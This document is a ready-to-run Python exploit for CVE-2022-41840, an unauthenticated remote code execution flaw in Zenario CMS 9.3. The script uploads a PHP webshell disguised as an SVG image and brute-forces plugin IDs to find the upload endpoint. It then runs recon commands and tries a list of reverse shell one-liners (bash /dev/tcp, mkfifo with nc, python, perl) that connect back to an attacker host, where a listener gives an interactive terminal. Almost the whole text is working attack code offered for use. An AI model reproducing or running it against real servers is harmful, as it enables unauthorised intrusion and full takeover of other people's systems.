#!/usr/bin/env python3 """ Zenario CMS 9.3 - Unauthenticated RCE Exploit (CVE-2022-41840) Upload endpoint (confirmed from PoC): POST /zenario/ajax.php?method_call=handlePluginAJAX&cID=1&slideId=0&cType=html&instanceId=20&fileUpload Field : fileUpload | MIME: image/svg+xml JSON response: {"files":[{"name":"x.php","path":"private\/uploads\/RAND\/x.php"}]} Shell: GET /private/uploads/RAND/x.php?cmd=id Usage: python3 zenario_exploit.py --target http://10.0.160.54 # interactive webshell python3 zenario_exploit.py --target http://10.0.160.54 --cmd "id" # single command python3 zenario_exploit.py --target http://10.0.160.54 --lhost 10.x.x.x --lport 4444 # reverse shell """ import requests, argparse, sys, re, time, json, random, string, threading, os, select, tty, termios from urllib.parse import urljoin requests.packages.urllib3.disable_warnings() R="\033[91m"; G="\033[92m"; Y="\033[93m"; B="\033[94m"; C="\033[96m"; W="\033[0m"; BOLD="\033[1m" def banner(): print(f"""{C}{BOLD} ╔══════════════════════════════════════════════════════════════╗ ║ Zenario CMS 9.3 - Unauthenticated RCE (CVE-2022-41840) ║ ║ Upload → JSON path → Webshell → Reverse PTY Shell ║ ╚══════════════════════════════════════════════════════════════╝{W} """) def log(msg, level="info"): tag = {"info":f"{B}[*]{W}","success":f"{G}[+]{W}", "warn":f"{Y}[!]{W}","error":f"{R}[-]{W}","cmd":f"{C}[>]{W}"}.get(level,"[*]") print(f"{tag} {msg}", flush=True) # ── Webshell: tries multiple exec functions in order ───────────────────────── # This ensures output even if system() or passthru() are disabled by PHP config WEBSHELL = b"""""" # ── Upload ──────────────────────────────────────────────────────────────────── def upload_shell(session, target, shell_name): # instanceId cycles from PoC default (20) then common values instance_ids = [20, 1, 2, 3, 4, 5, 10, 15, 25, 30, 40, 50] c_ids = [1, 2, 3] for cid in c_ids: for iid in instance_ids: ep = (f"/zenario/ajax.php?method_call=handlePluginAJAX" f"&cID={cid}&slideId=0&cType=html&instanceId={iid}&fileUpload") url = urljoin(target, ep) log(f"Uploading → cID={cid} instanceId={iid}", "info") try: r = session.post( url, files={"fileUpload": (shell_name, WEBSHELL, "image/svg+xml")}, verify=False, timeout=15 ) log(f"HTTP {r.status_code} | {r.text[:200]}", "info") if r.status_code == 200 and r.text.strip(): # Primary: parse JSON try: data = json.loads(r.text) flist = data.get("files", []) if flist: raw = flist[0].get("path", "") path = raw.replace("\\/", "/") log(f"Path from JSON: {path}", "success") return path except json.JSONDecodeError: pass # Fallback: regex m = re.search(r'"path"\s*:\s*"([^"]+)"', r.text) if m: path = m.group(1).replace("\\/", "/") log(f"Path from regex: {path}", "success") return path except requests.exceptions.ConnectionError: log("Connection refused — is target up?", "error") sys.exit(1) except Exception as e: log(f"Error: {e}", "warn") return None # ── Verify & get shell URL ──────────────────────────────────────────────────── def verify_shell(session, target, shell_path): if not shell_path.startswith("/"): shell_path = "/" + shell_path url = urljoin(target, shell_path) log(f"Verifying shell → {url}", "info") try: r = session.get(url, params={"cmd": "echo SHELL_TEST_OK"}, verify=False, timeout=10) log(f"Response body: [{r.text[:300]}]", "info") # show raw so we can debug if "SHELL_TEST_OK" in r.text: log("RCE confirmed — output received!", "success") return url elif "SHELL_OK" in r.text: log("Shell reachable but exec functions may be restricted — trying anyway", "warn") return url elif "NO_EXEC_FUNCTIONS" in r.text: log("Shell uploaded but all exec functions are disabled on this server!", "error") return url # still return, user may want to try other things elif r.status_code == 200: log(f"Shell reachable (200) but got unexpected body. Raw: {r.text[:200]}", "warn") return url else: log(f"HTTP {r.status_code} — shell may not be accessible", "warn") except Exception as e: log(f"Verify error: {e}", "warn") return None # ── Execute a command via webshell ──────────────────────────────────────────── def exec_cmd(session, shell_url, cmd): try: r = session.get(shell_url, params={"cmd": cmd}, verify=False, timeout=20) return r.text.strip() except Exception as e: return f"[Error: {e}]" # ── Reverse shell payloads ──────────────────────────────────────────────────── def get_reverse_payloads(lhost, lport): return [ # Most reliable on Linux f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'", # mkfifo (works when bash tcp redirection is blocked) f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {lhost} {lport} >/tmp/f", # Python3 f"python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"{lhost}\",{lport}));[os.dup2(s.fileno(),i) for i in range(3)];subprocess.call([\"/bin/bash\",\"-i\"])'", # Python2 fallback f"python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"{lhost}\",{lport}));[os.dup2(s.fileno(),i) for i in range(3)];subprocess.call([\"/bin/bash\",\"-i\"])'", # Perl f"perl -e 'use Socket;$i=\"{lhost}\";$p={lport};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");'", # nc with -e f"nc -e /bin/bash {lhost} {lport}", # nc without -e (OpenBSD nc) f"nc {lhost} {lport} | /bin/bash | nc {lhost} {lport}", ] def trigger_reverse_shell(session, shell_url, lhost, lport): payloads = get_reverse_payloads(lhost, lport) log(f"Trying {len(payloads)} reverse shell payloads → {lhost}:{lport}", "info") for i, payload in enumerate(payloads, 1): log(f"[{i}/{len(payloads)}] {payload[:80]}...", "cmd") try: session.get(shell_url, params={"cmd": payload}, verify=False, timeout=4) except Exception: pass # timeout is expected when shell connects back time.sleep(2) # ── PTY listener (fully interactive) ───────────────────────────────────────── def pty_listener(lport): """ Proper PTY-aware listener. Sets your terminal to raw mode so you get a fully interactive shell (arrow keys, tab completion, Ctrl+C all work). Automatically sends the PTY upgrade sequence on connect. """ import socket as _socket s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM) s.setsockopt(_socket.SOL_SOCKET, _socket.SO_REUSEADDR, 1) s.bind(("0.0.0.0", lport)) s.listen(1) log(f"Listening on 0.0.0.0:{lport} (PTY mode) ...", "success") log(f"Waiting for connection...", "info") conn, addr = s.accept() log(f"Got shell from {addr[0]}:{addr[1]}", "success") s.close() # Send PTY upgrade so we get a proper interactive shell pty_upgrade = ( "python3 -c 'import pty;pty.spawn(\"/bin/bash\")' || " "python -c 'import pty;pty.spawn(\"/bin/bash\")' || " "script -q /dev/null /bin/bash\n" ) conn.send(pty_upgrade.encode()) time.sleep(0.5) # Send stty to fix terminal size rows, cols = os.popen("stty size", "r").read().split() if os.popen("stty size", "r").read() else ("24", "80") conn.send(f"stty rows {rows} cols {cols}\n".encode()) time.sleep(0.3) conn.send(b"export TERM=xterm\n") time.sleep(0.3) log(f"{G}Shell upgraded! You have a PTY. Ctrl+C to kill.{W}", "success") # Save old terminal settings and switch to raw mode old_settings = termios.tcgetattr(sys.stdin) try: tty.setraw(sys.stdin.fileno()) conn.setblocking(False) while True: r, _, _ = select.select([conn, sys.stdin], [], [], 0.1) if conn in r: try: data = conn.recv(4096) if not data: break sys.stdout.buffer.write(data) sys.stdout.buffer.flush() except Exception: break if sys.stdin in r: ch = sys.stdin.buffer.read(1) if not ch: break conn.send(ch) except Exception: pass finally: termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_settings) conn.close() print(f"\n{Y}[!] Connection closed.{W}") # ── Interactive webshell (fallback if reverse shell isn't needed) ───────────── def interactive_webshell(session, shell_url): log(f"{G}Webshell active. Type 'exit' to quit.{W}", "success") print(f"{Y} URL → {shell_url}{W}") print(f"{Y} Tip → type 'revshell ' to get a reverse PTY shell{W}\n") while True: try: cmd = input(f"{C}webshell$ {W}").strip() except (EOFError, KeyboardInterrupt): print() break if not cmd: continue if cmd.lower() in ("exit", "quit"): break if cmd.startswith("revshell "): parts = cmd.split() if len(parts) == 3: lhost, lport = parts[1], int(parts[2]) log(f"Starting PTY listener on :{lport} then triggering shell...", "info") t = threading.Thread(target=pty_listener, args=(lport,), daemon=True) t.start() time.sleep(0.5) trigger_reverse_shell(session, shell_url, lhost, lport) t.join() else: log("Usage: revshell ", "warn") continue out = exec_cmd(session, shell_url, cmd) if out: print(out) else: print(f"{Y}(no output){W}") # ── Main ────────────────────────────────────────────────────────────────────── def main(): banner() p = argparse.ArgumentParser(description="Zenario 9.3 Unauth RCE") p.add_argument("--target", required=True, help="Target e.g. http://10.0.160.54") p.add_argument("--lhost", help="Your IP for reverse shell") p.add_argument("--lport", type=int, default=4444, help="Listener port (default: 4444)") p.add_argument("--cmd", help="Single command to run and exit") p.add_argument("--shell", help="Skip upload; use existing shell URL") args = p.parse_args() target = args.target.rstrip("/") session = requests.Session() session.headers["User-Agent"] = "Mozilla/5.0" shell_url = args.shell # ── Phase 1: Upload ─────────────────────────────────────────────────────── if not shell_url: name = ''.join(random.choices(string.ascii_lowercase, k=7)) + ".php" log(f"Target : {target}", "info") log(f"Shell name : {name}", "info") print() path = upload_shell(session, target, name) if not path: log("Upload failed on all endpoints.", "error") log("Hint: check the target's page source for instanceId=N in plugin URLs", "warn") sys.exit(1) print() # ── Phase 2: Verify ─────────────────────────────────────────────────── shell_url = verify_shell(session, target, path) if not shell_url: log("Shell not reachable — check path manually", "error") sys.exit(1) print() # ── Phase 3: Recon ──────────────────────────────────────────────────────── log("Recon:", "info") for label, cmd in [ ("id ", "id"), ("whoami ", "whoami"), ("hostname", "hostname"), ("uname ", "uname -a"), ("cwd ", "pwd"), ]: out = exec_cmd(session, shell_url, cmd) log(f" {label} → {G}{out if out else '(no output)'}{W}", "success") print() # ── Phase 4: Shell ──────────────────────────────────────────────────────── if args.cmd: out = exec_cmd(session, shell_url, args.cmd) print(f"\n{G}{out}{W}\n") elif args.lhost: log("Starting PTY listener then triggering reverse shell...", "info") t = threading.Thread(target=pty_listener, args=(args.lport,), daemon=True) t.start() time.sleep(0.5) trigger_reverse_shell(session, shell_url, args.lhost, args.lport) t.join() else: interactive_webshell(session, shell_url) if __name__ == "__main__": main()